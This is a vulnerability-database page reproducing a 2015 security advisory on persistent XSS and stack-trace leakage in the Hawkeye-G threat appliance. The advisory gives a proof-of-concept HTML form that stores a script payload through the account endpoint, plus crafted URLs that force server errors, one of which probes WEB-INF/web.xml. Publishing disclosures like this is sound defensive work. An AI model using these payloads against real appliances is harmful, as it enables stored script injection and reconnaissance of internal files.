Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Hawkeye-G 3.0.1.4912 Cross Site Scripting / Information Leakage

🗓️ 27 Jul 2015 00:00:00Reported by hyp3rlinxType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 29 Views

Hawkeye-G v3.0.1.4912 Persistent XSS & Server Information Leakag

Code
`[+] Credits: John Page ( hyp3rlinx )  
  
[+] Domains: hyp3rlinx.altervista.org  
  
[+] Source: http://hyp3rlinx.altervista.org/advisories/AS-HAWKEYEG0725.txt  
  
  
  
Vendor:  
================================  
www.hexiscyber.com  
  
  
  
Product:  
================================  
Hawkeye-G v3.0.1.4912  
  
Hawkeye G is an active defense disruptive technology that  
detects, investigates, remediates and removes cyber threats  
within the network.  
  
  
  
Vulnerability Type:  
=============================================  
Persistent XSS & Server Information Leakage  
  
  
CVE Reference:  
==============  
N/A  
  
  
  
Advisory Information:  
=====================================================================  
  
Persistent XSS:  
---------------  
  
Hexis cyber Hawkeye-G network threat appliance is vulnerable to  
persistent XSS injection when adding device accounts to the system.  
The appliance contains an endpoint sensor that collects client  
information to report back to the Hawkeye-G web interface.  
  
When adding device accounts to the system XSS payloads supplied to the  
vulnerable id parameter 'name' will be stored in database and executed each  
time certain threat appliance webpages are visited.  
  
  
Server Information Disclosure:  
-----------------------------  
  
We can force internal server 500 errors that leak back end information's.  
Stack traces are echoed out to the end user instead of being suppressed  
this can give attackers valuable information into the system internals  
possibly helping attackers in crafting more specific types of attacks.  
  
  
  
Exploit code(s):  
===============  
  
Persistent XSS:  
---------------  
  
<form id="exploit" action="  
https://localhost:8443/interface/rest/accounts/json" method="post">  
<input type="text" name="human" value="true" />  
<input type="text" name="name" value="<script>alert(666)</script>" />  
<input type="text" name="domainId" value=""/>  
<input type="text" name="domain_id" value="" />  
<input type="text" name="roving" value="false" />  
</form>  
  
Accessing URL will execute malicious XSS stored in Hawkeye-G backend  
database.  
https://localhost:8443/interface/app/#/account-management  
  
vulnerable parameter:  
'name'  
  
<input placeholder="Name" ng-model="record.name" id="name"  
class="formeditbox ng-pristine ng-invalid ng-invalid-required ng-touched"  
name="name" required="" ng-disabled="record.guid">  
  
  
Server Information Leakage:  
---------------------------  
  
These examples will result in 500 internal server error info disclosures:  
  
1-  
https://localhost:8443/interface/rest/threatfeeds/pagedJson?namePattern=&page=0&size=25&sortCol=address&sortDir=%22/%3E%3Cscript%3Ealert%280%29%3C/script%3E  
  
2-  
https://localhost:8443/interface/rest/mitigationWhitelist/paged?namePattern=WEB-INF/web.xml&page=0&size=0&source-filter=  
  
  
  
Disclosure Timeline:  
=========================================================  
  
  
Vendor Notification: June 30, 2015  
July 25, 2015 : Public Disclosure  
  
  
  
Severity Level:  
=========================================================  
High  
  
  
  
Description:  
==========================================================  
  
  
Request Method(s): [+] POST & GET  
  
  
Vulnerable Product: [+] Hawkeye-G v3.0.1.4912  
  
  
Vulnerable Parameter(s): [+] name, namePattern, sortDir  
  
  
Affected Area(s): [+] Network Threat Appliance  
  
  
===========================================================  
  
[+] Disclaimer  
Permission is hereby granted for the redistribution of this advisory,  
provided that it is not altered except by reformatting it, and that due  
credit is given. Permission is explicitly given for insertion in  
vulnerability databases and similar, provided that due credit is given to  
the author. The author is not responsible for any misuse of the information  
contained herein and prohibits any malicious use of all security related  
information or exploits by the author or elsewhere.  
  
by hyp3rlinx  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
27 Jul 2015 00:00Current
7.4High risk
Vulners AI Score7.4
hawkeye-gpersistent xssserver information leakagenetwork threat appliancehigh severityendpoint sensorinternal server errorthreat appliance webpagesdatabasestack traces
29